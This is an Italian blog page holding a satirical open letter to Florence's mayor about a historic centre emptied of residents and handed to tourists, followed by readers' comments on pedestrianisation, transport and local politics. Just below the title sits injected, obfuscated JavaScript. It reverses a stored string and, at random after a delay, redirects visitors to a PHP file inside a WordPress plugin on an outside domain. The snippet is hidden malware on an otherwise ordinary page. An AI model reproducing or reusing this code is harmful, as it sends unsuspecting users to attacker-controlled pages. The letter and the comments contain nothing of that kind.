Caro Sindaco, che bello un centro senza residenti!

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/06/turisti-a-firenze-1.jpg”>

Riceviamo e pubblichiamo

Caro Signor Sindaco,
ma che bella idea che ha avuto! Com’è bello che Firenze abbia finalmente un sindaco come Lei! Dopo anni di direzioni cittadine loffie, timorose e titubanti, sempre pronte a tirarsi indietro non appena qualcuno dei cittadini bubava, ora finalmente un po’ di decisionismo. Basta stare dietro alle lagne dei fiorentini, tanto non saranno mai contenti. Come insegna anche il nostro beneamato Presidente del Consiglio – e diceva sempre l’indimenticabile Wanda Pasquini – “Porso ci vole co’figlioli, porso!”.
In effetti era ora che i residenti si decidessero ad abbandonare il centro storico. Ma ci pensa, Sindaco, un centro finalmente senza residenti rompiscatole sempre pronti a lamentarsi della scarsa pulizia, del comportamento poco educato dei bottegai, dello scarso rispetto delle regole. Ma certo, le regole ci vogliono e vanno anche rispettate, ma che diamine, c’è modo e modo e persona e persona. Mica vorrà che quegli stilisti che hanno deciso di investire nella nostra città possano essere ossessionati da vigili zelanti perché hanno parcheggiato il SUV sulla pista ciclabile o sulle strisce pedonali? La legge sarà sicuramente uguale per tutti ma, come i nostri politici sanno bene,  ci sono persone che sono ben più uguali degli altri.
Ma lasciamo perdere discorsi politici; in ogni caso, insisto, che bello, un centro pieno solo di turisti, quelli sì che sono necessari agli affari della città, come Lei ha d’altra parte capito benissimo. E vanno incoraggiati al massimo. Ora finalmente potranno circolare in mandrie ancora più numerose, in tutti i meandri del centro storico, intasare le strade, sedersi su tutti i gradini senza taxi nervosi alle spalle o autobus che chiedono strada a colpi di clacson.  E niente più autobus soprattutto, solo quelli enormi a due piani con quei bei colori sgargianti che tanto si addicono al noto buon gusto fiorentino e pieni di quella buffa fauna che invece di guardare i monumenti fotografa le vetrine. Ora finalmente, nelle strade liberate dai mezzi pubblici vedremo solo tavolini di bar, bancarelle di tutti i tipi (eh, sì, occorre incoraggiare il commercio) insieme con macchine e furgoni parcheggiati.
Pensi, i miei nipotini hanno sempre desiderato andare a Disneyland, ma che vuole con questa crisi… Ora saranno finalmente felici, basterà che passeggino per il centro di Firenze. Ho sentito dire che oltre ai soliti clown, mimi, mangiafuoco, saltimbanchi che animano le notti cittadine con spettacoli indimenticabili, arriveranno finamente anche le giostre. L’ottovolante dove sarà collocato? Forse nella fontana del Biancone? Mentre, secondo me, i calci-in-culo vanno sicuramente sistemati attorno alla statua di Cosimo. I bambini perciò ringraziano. E Lei sa bene che le giovani generazioni vanno sostenute e incoraggiate.
Mi perdoni l’ardire di queste parole, dettate dall’entusiasmo di una persona poco colta ma che la ammira sconfinatamente. Se mi consente, vorrei però metterla in guardia dalle solite malelingue: gira infatti una diceria secondo la quale Lei (ma che impudenza!) passerà alla storia come Rottamatore sì, ma non del PD, bensì della città di Firenze.
Sua
Simonetta

0 Comments

  1. Giovanna

    Cara Simonetta, non ho parole…hai detto, nella maniera più chiara possibile, tutto quello che, in maniera confusa, mi girava per la testa stamani, in una mattina di ordinaria follia, mentre cercavo di trovare una soluzione razionale ai problemi di mobilità che rendono insopportabile la vita di quella particolare sottospecie ( in via di estinzione ) degli umani che va sotto il nome di “residente”. Grazie.

    Reply
  2. Francesca

    Grazie Simonetta!
    non posso essere piu’ d’accordo di cosi’!
    Abito nel castrum romano e due vigilesse il giorno di San Giovanni (finale calcio storico-fochi-pedonalizzazione-parcheggi gia’ inesistenti etc) alle mie domande su come rientrare a casa dal lavoro (dove non posso che arrivare in auto) mi hanno suggerito di tornare, se possibile, dopo il weekend…
    A proposito dell’ottovolante vorrei suggerire come possibile collocazione piazza Signoria, naturalmente con aggiunta di piscina dove tuffarsi e sbollire la rabbia. Grazie!

    Reply
  3. Roberto

    Questa lettera fa emergere con chiarezza e puntuale ironia lo stato attuale delle cose. Sotto la bandiera della rottamazione delle vecchie classi dirigenti e il decisionismo come unica via per migliorare la città si nasconde – forse – una politica debole che deve giustificare mosse come queste. Ah, badate bene che se provate a dire che ci son pochi bus daranno colpa ai tagli della Regione e del governo, se dite che il centro è desolato vi risponderanno dicendovi che non abbiamo capito la rivoluzione culturale dell’andare a piedi, e se c’è qualche commerciante o tassista che alza la voce diranno che è per difendere le lobby. Ah, scordavo. Se qualche politico – della stessa parte politica – non la pensa uguale all’amato ‘Matteo’ (Perché è così che dobbiamo chiamarlo eh) è ovviamente un coglione da rottamare. Come direbbero i suoi sostenitori su Facebook, senza neanche guardare lo status, “Vai avanti così! Sei il migliore!” Complimenti Simonetta.

    Reply
  4. Alessio

    In tutta Europa si considera la situazione più vivibile per i residenti quella che prevede di vivere in quartieri pedonali. Capisco che alcuni abbiano bisogno di usare l’auto, ma guarda caso tutti ne hanno necessità per un motivo o per un altro. Personalmente mi ha anche stufato questa spocchia nei confronti dei turisti (Mandrie?). Ringrazia il cielo che i turisti vengono ancora a Firenze. Mezza provincia di Firenze ci campa anche se ci fa comodo dimenticarcene.

    Reply
  5. Maurizio Sarcoli

    l’intelligenza e l’onestà intelletuale ormai sono merci rare in politica. Renzi si è mosso finora come un cantante che cerca la canzone di successo che lo possa lanciare nel firmamento dei vip.
    La sua politica fatta di colpi di testa (e non aggiungo di che tipo di testa) sono motivate da se stesse: è pura apparenza una pedonalizzazione fatta in fretta e furia senza considerare le conseguenze sulla mobilità cittadina.
    Io non uso l’auto, quindi sono potenzialmente d’accordo con la pedonalizzazione, ma quando questa crea ulteriori disagi a chi come me usa i mezzi pubblici, mi convinco che ditero non c’è una intelligenza d’insieme sulla gestione del trasposrto pubblico e privato nella mia città, ma solo una trovata di renzi per farsi pubblicità, qualcosa che aiuti gli elettori a credere nella favola del sindaco ‘innovatore’ e ‘nemico dei privilegi’, il sindaco che vuole restituire decoro e bellezza a Firenze.
    Mi sembra che il piano strutturale approvato in questi giorni racconti la verità deitro questa copertina: la solita allenza tra i poteri economici forti della città, le solite società amministrate anche da poltici del PD (la Quadra) che si pappano tramite dismissioni e conversioni d’uso il patrimonio pubblico (un esmpio? via dei Conciatori!). Un inciso: andate a trovare in via dei conciatori il gruppo ‘progetto Conciatori’ che denuncia la speculazione legata alla vendita di immobili pubblici a privati sconosciuti (una società nata appositamente per l’acquisto).
    è chiaro che alessio ha ragione, nelle sue argomentazioni, ma io mi trovo in sintonia più con Simonetta, che con ironia smonta la retorica di chi ci governa.
    Un espisodio per far capire che testa di… abbiamo come sindaco:
    durante un presidio del progetto Conciatori ha apostrofato i manifestanti: a voi servirebbe un progetto con Quadra.
    è stato giustamente sfanculato e subito il ragazzo che ha osato rispondere al semidio renzi è stato identificato, perchè il sindaco è alla mano, ma la mano gli si deve poi baciare, non mordere…
    Ciao, Maurizio

    Reply
  6. francesca l.

    @alessio
    i turisti non sono mandrie, ma VENGONO TRATTATI come tali. sarebbe bello che fiorentini e non venissero educati di nuovo alla bellezza misurata del rinascimento e del risorgimento. non ci credo che turismo di qualità e turismo per tanti non possano coesistere con economia, ecologia e soprattutto con la prosecuzione della cultura e della VITA VERA che hanno reso firenze quello che è e che tanto attira.
    tolto il senso di città, quello che resta è il parco giochi.
    ps. anch’io sono una fan delle pedonalizzazioni. il problema qui è che non c’è un progetto strutturato di città e trasporto, e le pedonalizzazioni lampo restano eventi puntiformi e appariscenti, alla lunga controproducenti.

    Reply
  7. Simone

    Beh, di tutta questa lettera condivido l’incipit: i fiorentini non sono mai contenti! Uffa, troppe auto… Uffa, tutti questi motorini ovunque che fanno casino e inquinano… uffa, non posso formire con le finestre aperte perché già alle 6 di mattina c’è un via vai di furgoni che non mi fanno dormire… Adesso di passa all’opposto: uffa, che silenzio in questa via pedonale… uffa, dove metto la macchina? Uffa, troppi turisti…
    Vabbé, che dire? Bene ha fatto il sindaco ad andare avanti, tanto se aspetta di far contenti tutti sta fresco! Ad ogni modo, comunque la si pensi, il compito di chi amministra è quello, appunto, di amministrare. I cittadini hanno dato la fiducia al sindaco e deve agire. Alle prossime elezioni la popolazione giudicherà.

    Reply
  8. IOAMOFIRENZE

    Vivo in pieno centro (ahime) in affitto un una casa di conoscenti dalle pari di Signoria. Beato me? Qui non si dorme dal caos … turisti a parte l’organizzazione del Quadrifoglio che passa a pulire le strade tutte le sere dalle 23.30 alle 24.30 e tutte le mattine dalle 6.30 alle 7.30 .In quell’ora passano come minino 5-6 volte avanti e indietro senza organizzazione e tanto a loro che gli importa, nel centro mica pensano ci sia gente che ci vivi e di dorme e la mattina lavora… Sarebbe gradita una pulizia + organizzata. Tipo: pulisco una strada ma non ci ripasso 5-6 volte facendo un casino infernale che chi ci vive alla fine o si lancia dalla finestra o si arma di molotof e le getta a quegli oggetti infernali del parco Disneyland di Firenze, che almeno pulisse tutta la città con lo stesso impegno… Vabbè tanto Renzi (furbo) mica vive in centro…

    Reply
  9. Rita

    Io abito in una piccola stradina vicino a s.Spirito e lavoro in via s.Agostino,la situazione così come era messa era diventata intollerabile ogni giorno spolverando toglievo catrame e non polvere. E’ senza dubbio vero che prima di togliere le auto andava organizzato i parcheggi e tutte quelle strutture necessarie,ma è anche vero che questi bisogni erano già persistenti prima della pedonalizzazione e nonostante questo neanche un centesimo era stato investito per tali strutture allora è un gatto che si morde la coda,non ci sono strutture non si pedonalizza,non si pedonalizza perché non ci sono le strutture? Per quanto riguarda i residenti nei centri storici di Firenze credo che più del problema auto sia da modificare i canoni d’affitto che nonostante la crisi nessuno ha pensato di abbassare,se un monolocale mi costa di canone 1500 euro è chiaro che vado a Scandicci dove per tre stanze ne pago 600,ma qui si tocca la proprietà privata e allora non va bene,questo vale anche per i fondi commerciali. Per ripopolare i quartieri non è necessario soffocarli con gli scarichi di automobili ma mettere in condizioni i giovani e quei pochi artigiani rimasti di lavorare e vedrete come si ripopola. PS: Non ho votato questo sindaco e non lo stimo certo ma neanche faccio lo struzzo!

    Reply
  10. Simonetta

    Bhe’, pero’, vedo che almeno interesse la mia ‘tirata’ l’ha sollevato! Osservo che ho ricevuto praticamente due tipi di commenti: residenti che sanno in che condizioni e’ il centro perche’ lo vivono sulle loro spalle e non residenti che nel peggiore dei casi dicono ‘me po’ frega’ de meno di quello che succede in centro, tanto non ci abito e non ci vado’ o, un po’ meglio, ricopiano pedissequamente gli slogan di moda: i turisti a Firenze sono necessari! forse, ma non questi che in centro ci stanno se va bene 2-3 ore, non ci dormono, manco mangiano e in caso fanno guadagnare solo le agenzie. Io non voglio usare la macchina a tutti i costi, vorrei solo delle pedonalizzazioni intelligenti che consentissero l’attraversamento del centro in modo veloce ai mezzi pubblici, che non costellino il centro storico di quelle catene e paletti orrendi che forse sono pensati per fermare la carica dei bisonti e che nel frattempo pongono seri ostacoli architettonici ad ambulanze, mamme coi passeggini, turisti con valigie, disabili, ecc. ecc.

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *